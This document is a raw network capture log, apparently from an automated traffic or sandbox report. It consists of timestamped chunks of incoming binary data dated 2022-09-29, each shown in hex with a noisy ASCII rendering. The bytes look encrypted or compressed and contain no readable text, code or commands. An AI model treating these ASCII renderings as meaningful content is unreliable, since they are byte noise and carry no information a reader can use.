                                                                                                                                                            2022-09-29 12:45:23 UTC31934INData Raw: 43 2f 43 b1 b2 f0 28 97 6c 9f cc 60 fc 22 b1 15 f7 9a 4a 26 b1 7d 47 76 18 f4 ec 36 7f 0d 03 d8 e0 82 25 3f 9b 6a 27 0d 2f b3 8b fd 38 15 3c e2 45 3a 24 58 63 9f 23 67 7b b5 19 dd f7 a5 a9 d8 d1 98 c2 23 be 6f 50 72 6e 91 5c b5 57 21 86 fa 81 e8 72 da 3e 17 e1 a8 dc 27 9c cf 6f 30 ea 45 9a 01 ea 91 72 50 24 e0 2f b4 6f d9 5c 81 9b 4d a8 b3 7a c2 90 9d ac d2 11 32 7e 25 d3 75 12 31 5b bd 81 29 1e 07 9c 79 52 a5 d2 25 d0 b0 42 93 e9 ce da a0 0a 29 d3 d7 d7 e6 fe 57 25 58 12 af 42 59 58 6f 18 a4 df f0 92 fb 84 4c 95 1a 9b 32 1f e1 66 59 10 13 9e b9 ea 3a 4b 2e f9 6f c4 e5 7d 66 12 51 78 69 4e cf e0 c6 a5 f8 94 37 b9 06 42 db 9e fc 56 98 04 28 85 d8 ff 61 a8 3e 8d 57 60 12 90 c8 d7 8e 77 a2 4e c5 43 48 3a 6d a3 fe cb e1 1d 35 c6 95 c9 3c 8a 82 c2 28 52 3b d9
                                                                                                                                                            Data Ascii: C/C(l`"J&}Gv6%?j'/8<E:$Xc#g{#oPrn\W!r>'o0ErP$/o\Mz2~%u1[)yR%B)W%XBYXoL2fY:K.o}fQxiN7BV(a>W`wNCH:m5<(R;
                                                                                                                                                            2022-09-29 12:45:23 UTC31950INData Raw: 56 41 8f fd a7 3f 09 f8 c4 45 60 2c 4d 3e 0e 02 a0 c1 c3 68 aa 59 28 31 53 f2 6f 63 0b b2 85 2d bd 9f a4 14 63 af e4 ff fc ad 29 30 ee a4 2f 4a 40 c9 cb 22 45 79 10 c3 62 b7 01 67 2a ac 90 ad b1 82 b2 3c be ec e3 89 78 b2 cd 55 25 e2 a5 ba b1 1e b9 c3 f1 fb 42 38 74 3f 6b 09 68 fd ba be ef 6b c3 97 65 90 28 b3 fc 17 94 87 f3 69 01 c9 41 2b c0 6c 88 e0 f5 91 9c 4d 7e f7 9d 83 3a 21 1a 56 06 5c 67 61 d9 da 9c fa b0 76 d4 c5 ec 5c 1a 2d 98 c3 47 36 2b a5 38 51 66 ef d9 47 a2 1d eb 90 13 5a 4e 6e c1 fc 1e dc 89 8d ed 51 be 3e c2 1f 25 f8 5d d8 7f bd 59 a1 11 e5 62 07 2b 37 f4 ac 04 03 9b e5 92 52 db 8f 88 78 68 57 7d 7a 0b 3a 8f 25 28 88 e4 d4 b0 3a 28 d4 a9 ba 92 92 8a 30 07 05 b6 a7 41 a9 93 26 bb 9a ab 95 68 01 89 e4 7f b3 64 c8 9c ce 40 21 a1 26 d8 8e b9
                                                                                                                                                            Data Ascii: VA?E`,M>hY(1Soc-c)0/J@"Eybg*<xU%B8t?khke(iA+lM~:!V\gav\-G6+8QfGZNnQ>%]Yb+7RxhW}z:%(:(0A&hd@!&
                                                                                                                                                            2022-09-29 12:45:23 UTC31966INData Raw: a6 9d bb c3 01 5a 07 9c 7b 21 c1 4c 48 4a 64 64 ff 71 ab 0f 21 43 44 13 e7 4a c1 d6 8f 4a d2 98 ab 9c 22 af d9 dd b3 1d f6 45 e8 f0 6e 7b e4 90 34 87 49 90 94 07 ca a1 5d 62 f2 87 07 58 c2 db d7 8c 97 cf a7 f7 b0 35 09 96 7e c6 4f dc c2 88 76 ed a5 27 35 31 73 7c e7 d7 f3 17 76 9f 0c 3f a8 65 ea cd c7 ae 13 dd 54 95 e3 07 b5 b3 f8 65 9e fb c9 dd c2 91 73 c3 16 e8 56 d4 d1 a1 d4 b9 8b 49 54 1b ce 29 d4 b0 ee 12 8d 34 96 b7 ac 04 04 89 bf 0d f1 7f 24 85 81 6e 14 9e 58 18 7f d3 d1 bf 91 43 b2 a7 6b 66 01 5c 09 bb eb dd 01 b4 cd a6 63 f5 8d 5c b1 00 40 88 77 ee 1f f2 85 e3 90 c5 5e 11 57 f8 67 46 dc 29 d9 26 d5 17 67 bc 4b 20 f3 7a a9 dd cd 22 8c d6 af d5 ac 0d ba 80 a7 af 81 14 94 a0 1b ea c1 be b4 bb 5d 12 e4 b6 52 90 bc 70 f6 2d c4 d8 62 f2 c4 df 43 13 f8
                                                                                                                                                            Data Ascii: Z{!LHJddq!CDJJ"En{4I]bX5~Ov'51s|v?eTesVIT)4$nXCkf\c\@w^WgF)&gK z"]Rp-bC
                                                                                                                                                            2022-09-29 12:45:23 UTC31982INData Raw: 2f b7 87 2d 80 7f 1f e2 a6 ee 75 5e 3d 1f f2 1f 52 10 b8 08 e5 ea f3 f8 5a 78 86 2e 20 22 e2 fe 8b 20 f4 d6 5c d7 71 e4 1b f8 0b ba 6c 58 cd af f9 69 1c 08 9b ee 6e 17 4b 30 b4 3e a8 97 ab 3e d5 47 13 4f 3d b0 02 47 96 f8 bc ac 65 f3 db 7b 82 fe f9 3a 42 be 32 38 60 eb 2e c6 4b 73 2a f1 fa fd 05 c4 2f 87 44 d7 a3 8a 28 73 a2 e8 63 79 ee 5f 87 9a ba 73 60 2f 84 39 b6 ba 86 72 93 44 1a c2 c4 7b 76 0b d4 f4 46 22 8a a6 bb 30 b9 72 0a c4 d4 3e a7 15 ef 2c 5d 35 86 57 e9 a5 ee 5c 75 c1 a6 ce 19 ba c1 93 e3 fc f5 41 59 0e a9 12 20 f0 9b 0d f8 c4 a7 0c 52 62 bf 3c cb 5e 5e 14 b8 2d f7 c7 02 5e d1 ac 68 ae 6a e1 fb 9b a4 9f 5c 6b e5 36 af 2a 25 37 a1 28 18 88 b9 5d dd 97 56 29 15 4d db ab 03 1f 83 51 bb a4 19 4f 41 50 25 e0 83 3b d3 38 e2 3c 21 89 32 f7 a2 9d 6a
                                                                                                                                                            Data Ascii: /-u^=RZx. " \qlXinK0>>GO=Ge{:B28`.Ks*/D(scy_s`/9rD{vF"0r>,]5W\uAY Rb<^^-^hj\k6*%7(]V)MQOAP%;8<!2j
                                                                                                                                                            2022-09-29 12:45:23 UTC31998INData Raw: fc 74 81 7c e6 fa 94 4b be cd 6e 3c ce 00 12 ca 00 a6 25 17 a7 d3 f7 11 a3 06 8f cf bc e3 3b 72 bf 4c 97 b6 6e 72 7d db 8a 8a 1d 21 ff 94 4a 6a 7b f6 fc a3 1b 4f 8a 66 9e 79 84 f3 f2 ce a6 42 25 48 db ca bd 61 2b 03 9c 85 8d 4d e0 a4 53 55 2c 36 0f bc 0d 3f 19 8f 35 be 39 db 1d c5 88 95 c7 3e ed fd db 1c c8 db cd 40 3a 0a 26 51 d8 8e 2e 8e b4 c8 ec d1 3c 8d ac d8 97 49 84 51 29 ea b4 04 1b 0c b5 8a 45 8a 2e bd d6 2d a3 d7 4a c3 d4 7b 81 31 95 c8 2f 2f ba 41 de 8a ac f9 a4 23 66 a4 75 6c 08 57 b6 0d a6 d6 cf 50 e2 d7 dd de 7a 06 35 e8 73 0a 54 20 3d f9 da db fb a0 72 4a 62 8c a4 96 66 f4 b1 ab ac 3c 3f e2 d4 6b 28 be fb 42 66 19 5f 69 14 1a b8 3c 46 8c 46 d1 69 17 c8 19 64 32 87 56 f8 a6 0e cd fc e1 92 34 1a 47 93 66 44 9c 47 47 d3 51 17 d3 6e fe c9 59 2e
                                                                                                                                                            Data Ascii: t|Kn<%;rLnr}!Jj{OfyB%Ha+MSU,6?59>@:&Q.<IQ)E.-J{1//A#fulWPz5sT =rJbf<?k(Bf_i<FFid2V4GfDGGQnY.
                                                                                                                                                            2022-09-29 12:45:23 UTC32014INData Raw: 10 00 21 7d d0 68 19 7b 08 43 ed 40 3d b2 28 6a fe 4c 09 b8 f8 62 73 a1 09 c9 b9 25 f1 9f 52 2b f8 0f 54 3a ba e4 98 07 1d a6 af fe 9f f6 75 3c db 66 35 ff 48 f2 29 d1 fe 0c d1 cb 2e bc c6 53 99 79 bd 1e fb 37 03 94 6d ec 66 ea 1f 5f cd c7 43 2b cb 2a b2 89 fc da 46 ff 95 00 b8 5b db d8 d6 fa 50 70 fe 93 ca 3d 80 06 bb 56 62 0d b4 92 74 13 55 97 72 d9 8b cf 36 d2 2f 55 ec 43 6d 13 2c c5 c6 71 e6 1a 6c 5a 5e ba e7 e9 9d 89 d5 25 1a 16 6b 38 20 bf 87 f6 2c 51 55 b9 d8 50 8d 60 1d ba 2f ab e0 ff 05 9d ac 4d c0 9d fd b6 49 0d 2f 8b e8 3f 64 4c ea fa 2d ea 9f 41 e9 fb 6c d6 c7 25 a4 e0 5b 2b 4c 89 33 5a 7d 08 53 c9 3c 57 78 28 46 9d b3 c8 d4 03 d5 19 f9 f2 a2 cd a5 ce 65 dc 41 03 ad 56 57 40 02 f1 72 2a 39 f2 2e 4c 3c 1e 00 bd 11 43 a3 cd d5 86 a1 ce 23 bb 74
                                                                                                                                                            Data Ascii: !}h{C@=(jLbs%R+T:u<f5H).Sy7mf_C+*F[Pp=VbtUr6/UCm,qlZ^%k8 ,QUP`/MI/?dL-Al%[+L3Z}S<Wx(FeAVW@r*9.L<C#t
                                                                                                                                                            2022-09-29 12:45:23 UTC32030INData Raw: f0 08 fd 87 c2 1b 29 09 89 74 d9 68 34 b6 b2 94 33 db 19 f2 8e 2e d8 8e 35 2b d5 48 e1 41 96 44 ee a3 10 92 a8 22 39 c4 62 60 e2 40 26 8a 50 26 67 43 e5 c7 72 27 d1 16 17 aa 2e 3b 9c 33 f7 f9 fa 1c 62 ee b4 c4 3f 33 7f dd 3b 3d d1 ac c7 05 56 e4 1f 26 31 e7 62 65 9d 48 1e 4b 74 58 f5 7e c1 ad 57 e2 79 65 ae e8 a4 c1 f0 29 02 fe 9f e0 ac 59 2b 4d 55 ba 48 0c 29 86 4b 25 e4 d1 14 ea 84 9f 5c ef dd 43 7b b0 8a ec 9f ab 28 d1 c5 38 fb 29 e8 44 a1 24 10 53 6d e3 e7 6c c8 18 2a d2 43 46 d5 c6 c3 39 e2 e1 65 01 25 87 78 80 60 66 6c 56 82 28 00 8a 8e 59 38 55 f8 40 64 20 ca 10 dc 17 a7 44 a4 7b b2 0d ea 8d 79 c3 cb c8 3d 11 2b 32 bf 9b bd eb 30 b7 90 35 b7 3e d3 83 e3 a9 14 e8 c3 e7 3f 40 cf 9e 28 0b 66 6e d6 7e 84 59 66 3c a2 13 8c 15 84 7a 6e 0d e3 f8 82 fb 2f
                                                                                                                                                            Data Ascii: )th43.5+HAD"9b`@&P&gCr'.;3b?3;=V&1beHKtX~Wye)Y+MUH)K%\C{(8)D$Sml*CF9e%x`flV(Y8U@d D{y=+205>?@(fn~Yf<zn/
                                                                                                                                                            2022-09-29 12:45:23 UTC32046INData Raw: f3 c8 8a 59 1f 5e 2e 0b 68 2e 05 d8 2c 0a db db d6 97 43 24 a2 cf d2 52 5b 30 cc 30 72 87 c9 2e 80 cb d5 28 60 3d 96 16 64 dd 29 d7 f9 ca 84 d8 7e 2d 88 ac 57 fe 29 d3 c4 aa f5 66 d8 af f1 65 3f 65 e9 2b 9d 42 8c b1 09 e7 18 eb c0 23 8b 7e 4b 75 6a a4 4b e2 1c 79 5f 13 92 ea 2d 37 d9 e3 7a ed 30 2c 47 77 fa 04 a7 29 72 36 b2 52 e9 0c 72 a4 c7 bc 57 29 31 1d a8 b5 31 14 80 e7 4c 2d 17 4a f8 16 6f eb ef 00 60 49 5f c6 f7 a1 9a 6b f9 61 a4 8c 78 fb 1b c6 17 0d df 78 ee e2 c0 18 75 6a 26 f6 d9 00 3b 67 ba 2e 16 ca d5 5d 53 90 a5 17 9b 8a c6 6f a7 db d6 d8 fa 86 9a 19 28 a4 30 f1 3a cd 74 5f ef d7 e6 c5 7a a2 47 41 9b 26 e2 1f cb 8b cd cd 60 89 3b 2e 0a 0c 5a 67 ba dc a0 d0 d5 4d bb e3 c4 80 cc 52 54 c2 b1 5e 47 6a ea 8f c3 55 3b 2c 64 78 b9 fd 86 4a 57 72 3e
                                                                                                                                                            Data Ascii: Y^.h.,C$R[00r.(`=d)~-W)fe?e+B#~KujKy_-7z0,Gw)r6RrW)11L-Jo`I_kaxxuj&;g.]So(0:t_zGA&`;.ZgMRT^GjU;,dxJWr>
                                                                                                                                                            2022-09-29 12:45:23 UTC32062INData Raw: ad 33 e9 7e d5 f3 78 65 af 31 05 00 72 0d 05 78 8e 4e 39 23 25 6c cd 30 5f ad 1f 52 29 1e 4e 7f 05 33 f3 5d 06 e1 53 5b 29 95 4f 29 ed 68 9f f1 03 6b 2f 8c cb 2a 24 7b 74 a2 fc 5d 0b b9 6d 45 07 a8 a8 b0 6d d7 60 e0 f5 40 63 85 58 6d 37 01 83 f0 ed 93 cc 09 de bc bb 57 7c f7 34 27 cb 20 b9 14 ff fb a9 28 62 1c d5 e3 9b 6a e5 09 f5 1f 81 47 c3 54 8d 46 f9 33 20 02 ec 6b 29 44 a7 48 a6 56 83 02 c9 da 55 17 cc bd 03 e8 5f e2 53 dc 92 78 82 ca cc df b7 3e 00 5a 20 93 88 9b 6d 30 33 79 46 29 a9 d6 b2 30 fb 15 aa 01 5b 8d a8 96 c9 7f a1 48 93 6e b7 ce 7c 5b e4 2d 8f f2 16 1e b0 70 18 c9 f8 66 82 8e 11 27 57 e0 86 ed 88 49 eb ec 8f 7c bf e6 7b b2 f1 8e e2 02 b2 4e ee 86 12 e1 81 6a 51 67 ce a3 c9 81 db 8e 91 df fe 78 8b 8c 0d 0f f8 c8 14 c2 0c 6f 51 44 8b 49 a0
                                                                                                                                                            Data Ascii: 3~xe1rxN9#%l0_R)N3]S[)O)hk/*${t]mEm`@cXm7W|4' (bjGTF3 k)DHVU_Sx>Z m03yF)0[Hn|[-pf'WI|{NjQgxoQDI
                                                                                                                                                            2022-09-29 12:45:23 UTC32078INData Raw: af ab 80 da 99 0d 6e 4f 0f 1d 2c 60 6f 30 b8 22 d9 06 5d 5d 20 cd eb 8c 8e 64 ed d6 59 c4 6c 41 ef f9 f5 1f 9a c7 89 aa 3f 9e 16 c6 84 d4 2f c1 1c b5 bb 8b e7 90 a5 c7 94 96 53 2b 6f 4e 3d 25 ba dc 59 c9 c8 38 ae 83 bb 40 4e b1 b0 55 4d da 8f 34 e5 2d 76 f3 f2 20 20 e7 9d e1 aa 3b 5d 7b 5b 1f 55 e1 c9 5e 4d b6 4a 1d 1c c9 47 11 7f 51 80 57 c6 b1 32 0d 0e c0 3c f8 ac 1e bb 3c e1 32 33 3b 52 b3 a6 30 e6 c9 69 02 0c 7d 7e 8c 2e 02 7c 3a e8 34 86 49 49 68 bd 01 6a e2 80 87 47 ff 9f e5 de ab 08 1b c0 87 28 b9 d3 70 22 a7 3b 9f a3 c2 26 44 78 21 72 db 69 11 45 94 fe d2 2b f0 3a 7d 4d 41 78 d7 ad 35 c5 95 7f fe f2 f4 7a 36 87 96 67 4a da da 08 79 37 1e fb e1 77 9a d5 62 c8 94 ed 33 db f7 9c ad 6f cb 6a 5b a9 a8 2a 81 e4 6f e2 8d f9 1d ed a1 e1 ac 76 8f 56 6f 25
                                                                                                                                                            Data Ascii: nO,`o0"]] dYlA?/S+oN=%Y8@NUM4-v ;]{[U^MJGQW2<<23;R0i}~.|:4IIhjG(p";&Dx!riE+:}MAx5z6gJy7wb3oj[*ovVo%
                                                                                                                                                            2022-09-29 12:45:23 UTC32094INData Raw: ca 40 9b 38 0f 3c df 6f 00 a7 ad 0d d4 82 21 43 bd ba f8 20 f3 51 45 b7 19 0b 8e 30 6c 94 e1 0b 62 ee df a3 ae 69 d3 c5 17 49 bf 7c 2d ce dd d2 ef b8 be a1 c8 c3 2e 34 60 f3 f2 71 e2 7d 11 1f dc 94 0f b9 f5 d2 06 13 92 b4 a0 2d e0 d2 25 55 17 1f 19 3e c3 2f cd a1 d1 9e e5 7f 74 c6 d7 fa 01 f0 ee 99 dc 0e 15 7c 58 1b 74 f8 ce 0d bc 15 22 4a 87 5b d0 a1 9a 1b b7 bf 24 4e 86 fd 55 50 4a 33 a4 aa ee 74 b9 a9 15 6d a1 8f 3b ce b8 28 b9 45 7b a2 fb 44 12 94 b5 22 25 17 97 c0 1f 0a 79 8b f9 ed 87 52 bc 50 62 74 9d b7 02 e2 d6 22 24 19 63 fe 36 6e 55 a4 9a 91 a2 33 02 b8 05 2f 79 b0 8b a7 50 87 ed 99 92 5e 14 6c 14 93 d0 01 0d 42 1c 77 af bd e4 69 1d af 2c ba 44 c5 af ca f9 8a 5c eb 4c 35 74 fe 3c 28 bf 17 16 06 24 32 0a fd 2a bb 19 99 9b d8 b4 4b 85 1b 16 1d d4
                                                                                                                                                            Data Ascii: @8<o!C QE0lbiI|-.4`q}-%U>/t|Xt"J[$NUPJ3tm;(E{D"%yRPbt"$c6nU3/yP^lBwi,D\L5t<($2*K
                                                                                                                                                            2022-09-29 12:45:23 UTC32110INData Raw: 64 b7 44 84 07 d9 2c 7e 90 d5 c1 a4 2d 2c 21 1a 53 00 45 82 ce d8 3b 30 64 40 c3 c7 09 64 f5 24 fe 17 a2 96 ad 53 39 dd 44 fb 2d 9c e9 11 2d 22 f3 fc 5c 56 12 97 1b 97 a4 e8 c5 8f 8c 79 8c 23 bf 77 6c 5e c0 71 cc 66 4b 35 45 79 31 a6 6d fc 2f 90 2c be c9 1d 89 2b eb 78 eb 60 f5 e5 8f 1e 85 de 38 a5 7e 50 44 f5 ad 10 9a 69 b5 72 3d dc 71 ca ea b8 60 3e ea d4 36 3e 30 ff 8a 53 c7 5b 7c ae b2 00 b3 f9 9f 3f cc 57 a5 2c fc 57 c2 7e 92 c5 2a 3f 6c 7c ed b8 19 2c a3 7d 6c 1a 0a 1c 3e 34 66 ab 03 0b 33 ba 52 5a 91 b8 b8 80 83 64 3b 63 c9 a7 c5 f0 4f f8 d4 dd db 51 6d 57 6a fa 23 73 71 ed c1 b0 8e 41 5f ab 52 2d d4 78 24 bd 93 f2 2e 80 31 82 f8 f5 c0 c2 6d 9f 98 7a 60 a9 31 55 5a 93 19 7b 53 61 2c b7 37 e4 fb 9b 28 3f 45 a6 e3 6d 06 29 96 e8 c7 8c 9d 49 e4 d5 f5
                                                                                                                                                            Data Ascii: dD,~-,!SE;0d@d$S9D--"\Vy#wl^qfK5Ey1m/,+x`8~PDir=q`>6>0S[|?W,W~*?l|,}l>4f3RZd;cOQmWj#sqA_R-x$.1mz`1UZ{Sa,7(?Em)I
                                                                                                                                                            2022-09-29 12:45:23 UTC32126INData Raw: 21 a5 f7 c4 ca bc 9e 9a 1a 6b 7d 68 5a b4 fc 6c 11 cc a2 6d 38 01 0c f0 27 1f eb 52 44 87 5c 8c 18 ea 62 f4 0f cb e8 80 bd 3c bb 35 30 f1 37 21 ce 2e d6 fe 15 3d 78 6a 90 4f f5 de 5a 49 0b 2a f5 80 c8 5d cb 33 b8 3c 74 c1 6f 3c f5 b4 c6 4b 9f e4 c1 dc 1b 17 77 2d bd 7c 31 db 6e ac 15 f6 32 d8 76 fb bd be e3 41 33 2d 14 a8 50 3a 15 b0 e6 8f 4c de 8b 03 a0 8e 4a 3d 83 33 b7 ed 86 f7 ff e3 d4 30 80 ee de 4c 56 f2 1e 5f 5c 12 5d bd a3 d7 ad 1c 6a 0f d5 30 bb 84 8d 1c 18 04 85 16 81 90 3c 74 94 88 83 e8 28 ff 6f af 8b 4e 87 d5 a2 cb fb 67 04 c4 5c f5 7e a1 0f 71 96 bf f3 15 74 45 fe 82 50 59 8c 62 54 64 9e 69 f7 cb 86 ed 82 6e 95 13 70 1f bc 34 21 aa f3 43 3b 49 de 58 98 51 2c 01 9c f7 28 55 09 0a 77 92 4f 14 13 bd 9a c6 56 43 0c 6b 15 ba 6b 6d 3d 43 a0 d5 74
                                                                                                                                                            Data Ascii: !k}hZlm8'RD\b<507!.=xjOZI*]3<to<Kw-|1n2vA3-P:LJ=30LV_\]j0<t(oNg\~qtEPYbTdinp4!C;IXQ,(UwOVCkkm=Ct
                                                                                                                                                            2022-09-29 12:45:23 UTC32142INData Raw: c6 19 9c 3b 40 22 39 c5 1f ea 6a 3b c5 4b 56 11 80 f4 f5 0a aa 45 a0 dd 59 33 9d e9 06 ed 7b d7 25 1a 23 7f 1d ad 96 56 30 7a 67 38 91 b4 9c dd 5b 32 37 26 d8 58 97 26 f1 e8 ba f6 96 43 05 1b 04 58 e7 5d 53 95 45 73 89 ae 36 a9 8e b4 c8 d4 c6 77 af ad 3e 44 ca 61 c2 20 d2 43 8c dc 17 76 74 d6 63 71 b5 81 2b f6 a4 2d 9b d5 3e 44 2c 64 97 86 b8 10 f7 1f 2c 28 5a bb 21 af 0a d0 94 2b 9f 3d b0 ed 61 16 7c 1b 41 24 ce 5a 26 f3 ce e4 e9 2e 57 ea 60 10 af 0c d8 c3 97 73 6d b2 d7 41 28 4f 20 19 99 a0 a1 67 c8 d5 e3 d3 2a 9b 8d 45 e7 82 d8 9a af 94 99 f6 fe 69 48 22 22 0a d4 e2 cf c5 30 a4 21 8e eb c1 36 e1 f0 12 89 2d 2f a9 07 33 d1 5a 0b 65 f7 7d a2 0b c7 74 46 56 bb 90 89 b8 91 13 e3 49 78 d7 d0 62 7a 92 6e 97 13 c0 24 03 e3 88 f2 89 27 2e 16 0d 21 5b 48 4c 3e
                                                                                                                                                            Data Ascii: ;@"9j;KVEY3{%#V0zg8[27&X&CX]SEs6w>Da Cvtcq+->D,d,(Z!+=a|A$Z&.W`smA(O g*EiH""0!6-/3Ze}tFVIxbzn$'.![HL>
                                                                                                                                                            2022-09-29 12:45:23 UTC32158INData Raw: 0f 05 f7 84 8f 3f 8f d8 63 f7 19 87 43 90 06 d4 ce 6f d5 b2 ea 7f d8 13 c7 eb a3 81 35 fd c9 8e e2 f0 97 59 5d 45 74 ca 8b d9 18 a1 33 45 a3 06 c3 cf 87 60 50 70 13 6c 07 67 12 d6 89 71 90 1a 7c f1 63 bc ac 0b a3 78 86 f5 b1 e9 ed 58 59 4e 12 23 1e fb f4 71 de 17 00 76 43 7f 64 eb 23 a6 d2 99 ee d6 d6 6d 5e 67 8f 79 a0 e1 d5 39 e6 4e be 49 23 64 f8 21 60 ef c1 84 35 0b 6c 9c f4 18 92 70 e2 5e 8d ff f2 44 51 c0 48 46 2d 84 29 a4 57 f6 6f 74 55 e9 74 2a d4 16 b0 14 fd c9 14 c7 30 17 13 c1 46 96 82 75 03 4f 32 0b 8d 10 56 6e 2d 8e ba 58 fc 3b a5 0a 74 d9 40 37 e8 a8 ce 5b 5c 9b 59 36 89 ea 05 80 59 f3 e5 a9 35 36 36 0d 80 30 c9 07 ea 05 cd bd 70 f2 a0 65 d9 b0 e2 81 e3 ee d5 42 3d 30 46 ac a1 7e f9 0a 16 c3 09 ff 73 be c3 7a b3 63 47 b7 5d b9 24 6d 35 fc 93
                                                                                                                                                            Data Ascii: ?cCo5Y]Et3E`Pplgq|cxXYN#qvCd#m^gy9NI#d!`5lp^DQHF-)WotUt*0FuO2Vn-X;t@7[\Y6Y5660peB=0F~szcG]$m5
                                                                                                                                                            2022-09-29 12:45:23 UTC32174INData Raw: c5 b8 23 c9 2d f5 7a da 4b d9 0c cf 82 58 7d 96 20 df 7e 56 1e e1 03 fd e6 a2 95 0f 50 4a 02 df d9 5d 78 8c 92 75 84 45 28 df 51 50 c1 5d 4d e1 46 f5 ba 7e 36 6c 34 e4 e2 5a f1 40 47 63 7e 8c 55 71 18 39 7c 7a 6a a0 db 84 9e 3d 6f 6e aa bd ab 8a 0a 61 43 02 b1 6b cb 58 44 1a e1 f2 a6 9c f0 14 b3 43 45 3c 4c 84 83 b2 7e 0b c7 73 bc a1 05 e2 66 e4 fe 5e 14 ff f8 19 27 d1 3c f4 5b 16 5f 5b 94 d7 8d 0d d1 9c 34 be ff ab c6 b9 0a 56 9b a1 9c fe 88 09 20 13 78 ee 9c 01 e0 38 dd 2c ff af 94 86 7f 28 f8 35 8f 5a f4 76 b9 d4 e7 5a 80 ba 53 5a 94 2b 3d f9 e1 44 00 5a 4d 30 44 f9 0e dc 84 8b da 28 2b 30 ea e0 50 c3 40 22 a4 1b 7a 96 6d 58 ea 29 a3 a2 a6 12 cd 72 96 93 0f 26 79 c1 20 dc f6 02 e0 43 20 be b8 88 4f 38 84 47 ee b3 f0 67 da 64 62 b4 c1 23 3a ed 84 d9 da
                                                                                                                                                            Data Ascii: #-zKX} ~VPJ]xuE(QP]MF~6l4Z@Gc~Uq9|zj=onaCkXDCE<L~sf^'<[_[4V x8,(5ZvZSZ+=DZM0D(+0P@"zmX)r&y C O8Ggdb#:
                                                                                                                                                            2022-09-29 12:45:23 UTC32190INData Raw: cf 08 09 83 ea 7e 01 db bb c8 80 bf 2e 55 75 a8 4a 3e ce a9 4e 4d ba 35 35 36 90 5b 4c d2 39 83 10 ca ca f4 2c 6d 40 5d eb 9c f9 0c c9 56 62 10 0e 72 a9 cc 3a 80 0a f9 02 cb 8e 13 6b d1 22 17 a3 6c a1 34 eb f0 5a 4b ed 55 37 c5 1c dd eb 89 46 0b 98 2c 08 93 3b 41 52 06 0f c0 3a 23 7c ee d9 0f 06 d1 0a 4e 78 04 5f c0 5e e2 8a 5b 8f 43 75 92 1a 3b 15 9c 91 27 67 c1 29 8b 5a 6d 82 02 89 98 9e 6b 4a 1d 70 0d 3a 40 b9 9a 3b 0f e9 60 41 0f ef d5 a9 91 09 4d c4 a8 a9 81 b5 64 3b a1 13 4e ba 2d 23 2d c5 1a 95 3e 96 3e 14 7f c3 47 0a 4d b9 11 1a 5d 16 f7 f3 d5 94 fc 50 59 d8 8b e9 55 46 fc 94 68 27 c8 b8 35 90 66 d5 23 d5 f7 77 7e 87 09 58 2c 4e 1a 5d 0b 02 ba eb 68 23 4b d5 e6 c2 62 a9 2d d2 b3 56 90 01 74 9a c6 a5 f0 db 35 28 da b7 fd 03 ba 36 51 26 c4 af b6 52
                                                                                                                                                            Data Ascii: ~.UuJ>NM556[L9,m@]Vbr:k"l4ZKU7F,;AR:#|Nx_^[Cu;'g)ZmkJp:@;`AMd;N-#->>GM]PYUFh'5f#w~X,N]h#Kb-Vt5(6Q&R
                                                                                                                                                            2022-09-29 12:45:23 UTC32206INData Raw: f2 3a 75 68 3e 0f e3 f2 c4 b2 99 f0 8d 46 91 54 15 3f de c9 d4 7e e2 19 3e 84 00 c6 65 33 f3 fe fa 51 17 24 3f a7 7d b7 62 c2 ef 88 9a 3c f3 cd 50 9d 9e 8f 5d 61 cb a0 a4 03 50 f0 dc 5c ad 15 02 ab a7 69 f5 8e f1 b5 2a 10 a3 b4 b1 09 9a d4 5e cd d0 55 63 cc 69 20 01 5e 9a 7f 12 bd 61 55 aa 27 d0 4d 1d 22 0e 3d b6 78 8e 0e 72 c2 8d 2e ca cd 79 0d e9 36 ab 9a 8e ff 3e 95 6d 21 c7 1a b7 87 cc 40 26 b5 04 f8 f1 da 9d 52 12 8b 3a 54 a8 7c b5 bb 09 58 55 0c a3 5e 9e 18 3d e3 ce be 40 67 c1 8b 0c 1a 55 26 9f ff b2 b3 90 fd 3a 20 4b b0 8e e3 8e 36 d2 a3 6e 4f 4c 92 94 c1 39 70 4a 02 df 2f b8 89 d5 29 1b 84 54 3f e4 0b e7 f2 fc 2f e7 5e 95 ef 10 b8 ae e7 20 40 59 ce 60 f3 f0 2e 72 fe cd a9 a5 80 40 80 c4 dc 25 ce 8e 41 7e ef 07 74 b3 da e1 eb 7a 8e c0 56 af af 13
                                                                                                                                                            Data Ascii: :uh>FT?~>e3Q$?}b<P]aP\i*^Uci ^aU'M"=xr.y6>m!@&R:T|XU^=@gU&: K6nOL9pJ/)T?/^ @Y`.r@%A~tzV
                                                                                                                                                            2022-09-29 12:45:23 UTC32222INData Raw: 22 da 72 72 6c 3e 46 c3 7b ca de 24 e0 a6 63 60 9d 64 b0 87 5b 3e 1a 72 99 0f 92 9b 64 fa be d2 71 03 d2 3e 33 e5 f9 a1 75 27 22 01 67 15 fc c5 f5 5b 96 4b a8 f9 57 e6 f7 72 f3 18 b3 6c 5d 4a 6a 67 ab 45 c8 12 34 d2 b6 cb e7 4f 34 11 af e0 f1 42 c2 8e cd e7 96 db 98 05 42 fb 1e b7 60 2a f1 75 1f 5a d7 62 5d ae fc 11 4b 6d 10 a8 7c a1 8f 25 9a f1 e2 ac fe 9a 38 28 8c 2c 3a 01 29 db 3b 3d a5 dd 9d 56 95 0d aa a5 c5 5c 22 a5 bb e7 1d c5 43 c4 26 f1 e5 0d 3a 7e 08 15 99 9e 73 6d 10 05 f4 60 af 91 2f ab 01 45 75 4f f0 a7 5d dd 43 49 26 b3 1d 26 76 77 b1 e0 be 45 8a 31 f8 42 f8 fd 19 ef 76 aa d8 07 0d 20 36 88 32 56 c8 89 9d 2f 6a e6 8f fa 98 e2 96 ec fe af e3 51 9b e7 47 87 20 db 9d 52 92 90 93 9e 3a d4 1e 77 10 0b 2a 6f f7 41 ef dd ee 6c b1 4b 27 ab 26 d1 ed
                                                                                                                                                            Data Ascii: "rrl>F{$c`d[>rdq>3u'"g[KWrl]JjgE4O4BB`*uZb]Km|%8(,:);=V\"C&:~sm`/EuO]CI&&vwE1Bv 62V/jQG R:w*oAlK'&
